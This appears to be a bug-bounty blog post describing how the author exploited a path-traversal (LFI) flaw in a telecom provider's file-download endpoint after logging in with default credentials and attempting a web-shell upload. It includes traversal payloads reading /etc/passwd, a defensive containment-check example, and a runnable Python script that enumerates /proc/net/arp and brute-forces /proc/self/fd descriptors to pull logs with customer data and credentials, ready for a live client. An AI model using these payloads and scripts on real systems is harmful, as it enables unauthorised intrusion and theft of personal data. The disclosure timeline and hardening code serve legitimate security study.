How I found LFI on India’s biggest Telecom Service Provider through a third-party service

Hey folks, I want to share one of my recent findings with you, so I thought I’d write a blog post about it. As the title says, it’s Local File Inclusion (LFI). Yes, that’s what I found.

So this is how the story went: I was surfing the internet when I came across a site. Let’s call it xyz.

When I visited the site I started poking around to find something, and after some recon I found an admin login page. Bingo!! I know what you’re all thinking. Admin? I tried it and reached the admin login page. In those first seconds I was shocked at how India’s biggest telecom service provider protects its admin panel.

Using default login credentials, I got into the admin portal. Seeing a file-upload option, I tried to upload a malicious web shell to the site.

Executing the uploaded shell failed with an error. But looking at the URL endpoint, “getfile.jsp?file=”, I suspected it fetched files from the server by name.

Guess what: I found LFI. https://www.target.com/fileupload/getfile.jsp?file=../../../../../../../etc/passwd returned the contents of /etc/passwd, so the “file” parameter of getfile.jsp was vulnerable to LFI (path traversal): the server joined whatever I supplied onto its upload directory and opened it.
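To show why that URL worked, here is an added Python example that is not the target’s JSP code (which was never disclosed): it reconstructs the unsafe lookup pattern a getfile.jsp-style handler would use beside a hardened version with a containment check. The upload directory path is an assumption.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed location of the upload directory on the server; the real path is unknown.
UPLOAD_DIR = "/var/www/app/fileupload"


def resolve_vulnerable(file_param: str) -> str:
    """Mimic a getfile.jsp-style handler that glues the user-controlled 'file'
    parameter onto the upload directory with no validation.

    Returns the path the server would actually open.  Because '..' segments are
    honoured, a traversal payload walks out of UPLOAD_DIR entirely.
    """
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, unquote(file_param)))


def resolve_hardened(file_param: str) -> Optional[str]:
    """Same lookup with a containment check.

    Decode once, refuse NUL bytes and empty names, normalise the joined path and
    then require that it still lies strictly inside UPLOAD_DIR.  Returns None
    when the request must be refused (the caller should answer 400/404).
    """
    decoded = unquote(file_param)
    if not decoded or "\x00" in decoded:
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_DIR, decoded))
    # The trailing slash matters: without it "/var/www/app/fileupload2/x" would
    # pass a plain startswith() check.
    if not candidate.startswith(UPLOAD_DIR + "/"):
        return None
    return candidate


if __name__ == "__main__":
    payloads = [
        "../../../../../../../etc/passwd",                  # the payload from the write-up
        "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",  # URL-encoded variant
        "/etc/passwd",                                     # absolute path: join() discards the base
        "../fileupload2/x",                                # sibling-directory trick
        "report.pdf",                                      # legitimate upload
    ]
    for p in payloads:
        print(f"{p!r:52} vulnerable -> {resolve_vulnerable(p)!r:36} hardened -> {resolve_hardened(p)!r}")
```

Note that posixpath.normpath clamps at the root, which is why seven “../” segments (more than the depth of the upload directory) still land on /etc/passwd rather than failing; the hardened version does not try to count them, it simply checks where the normalised path ends up.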

Having confirmed the LFI, my aim was to escalate it to RCE and look for privilege escalation, since the server was running an older kernel version.

Let’s see what more we can get: reading “/proc/net/arp” gave me local IP addresses and their MAC addresses.

I knew that “/proc/self/fd” exposes the files the server process has open, which includes its access logs and various other system-related files (through a web application, /proc/self is the server process handling the request). I ran Intruder over /proc/self/fd/<number>, and guess what: I was able to download the entire log file, which contained customer data, internal IP addresses and login credentials.
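The /proc/net/arp read and the Intruder run over /proc/self/fd/<number>, as an added Python example that is not part of the original post: it builds the traversal URLs for the endpoint from the write-up, parses the ARP table, and walks the descriptor numbers keeping only those whose content looks like an access log. The host name is a placeholder and all responses are constructed samples so the script runs offline.

```python
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import quote

# Endpoint shape taken from the write-up; the host is a placeholder, not the real target.
BASE_URL = "https://www.target.com/fileupload/getfile.jsp?file="
# Seven '../' reached / in the original payload; extra ones are harmless, normalisation clamps at root.
TRAVERSAL = "../" * 7

# A fetcher takes a URL and returns the response body, or "" if the read failed.
Fetcher = Callable[[str], str]


def lfi_url(server_path: str) -> str:
    """Build the getfile.jsp URL that reads an absolute path on the server via traversal."""
    return BASE_URL + quote(TRAVERSAL + server_path.lstrip("/"), safe="/")


def confirm_lfi(fetch: Fetcher) -> bool:
    """Step one of the write-up: does /etc/passwd come back with a root entry?"""
    return "root:x:0:0" in fetch(lfi_url("/etc/passwd"))


def read_arp_table(fetch: Fetcher) -> List[Tuple[str, str]]:
    """Pull /proc/net/arp and return (ip, mac) pairs, skipping the header line
    and entries the kernel has not resolved (all-zero MAC)."""
    pairs = []
    for line in fetch(lfi_url("/proc/net/arp")).splitlines()[1:]:
        cols = line.split()
        if len(cols) >= 4 and cols[3] != "00:00:00:00:00:00":
            pairs.append((cols[0], cols[3]))
    return pairs


# Combined-format access-log line: client IP ... "GET /path" or "POST /path".
LOG_LINE = re.compile(r'(\d{1,3}\.){3}\d{1,3}.*"(GET|POST) ', re.IGNORECASE)


def enumerate_fds(fetch: Fetcher, max_fd: int = 64) -> Dict[int, str]:
    """The Intruder run from the write-up: walk /proc/self/fd/0..max_fd through the
    LFI and keep the descriptors whose content looks like an access log.

    /proc/self is the process answering the request (the web server), so the
    descriptors it holds open include its own log files."""
    hits: Dict[int, str] = {}
    for fd in range(max_fd + 1):
        body = fetch(lfi_url(f"/proc/self/fd/{fd}"))
        if body and LOG_LINE.search(body):
            hits[fd] = body
    return hits


# ---- Constructed sample responses so the script runs offline; not real target data ----
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\nwww:x:1000:1000::/var/www:/sbin/nologin\n"
SAMPLE_ARP = (
    "IP address       HW type     Flags       HW address            Mask     Device\n"
    "10.0.0.1         0x1         0x2         00:11:22:33:44:55     *        eth0\n"
    "10.0.0.7         0x1         0x0         00:00:00:00:00:00     *        eth0\n"
)
SAMPLE_LOG = (
    '10.0.0.23 - - [08/Jun/2019:10:14:02 +0530] "GET /admin/login.jsp HTTP/1.1" 200 512\n'
    '10.0.0.23 - - [08/Jun/2019:10:14:09 +0530] "POST /admin/login.jsp HTTP/1.1" 302 0\n'
)


def fake_fetch(url: str) -> str:
    """Stand-in for an HTTP client: answers only the paths the demo reads."""
    if url.endswith("/etc/passwd"):
        return SAMPLE_PASSWD
    if url.endswith("/proc/net/arp"):
        return SAMPLE_ARP
    if url.endswith("/proc/self/fd/9"):   # pretend fd 9 is the open access log
        return SAMPLE_LOG
    return ""


if __name__ == "__main__":
    print("LFI confirmed:", confirm_lfi(fake_fetch))
    print("ARP neighbours:", read_arp_table(fake_fetch))
    for fd, body in enumerate_fds(fake_fetch).items():
        print(f"/proc/self/fd/{fd} looks like a log ({len(body.splitlines())} lines)")
```

Against a live, authorised target you would pass a real client in place of fake_fetch (for example a wrapper around requests.get that returns the body or "" on a non-200 status); nothing else changes. The all-zero-MAC filter matters because /proc/net/arp lists incomplete entries too, and the log heuristic is deliberately loose: error logs and rotated logs held open by the server will also show up, which is exactly what you want during this kind of enumeration.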

Report details

June 8, 2019 — Bug reported to the Telecom company.

June 10, 2019 — Bug was fixed.

June 13, 2019 — Got appreciation.

Thanks for reading!!!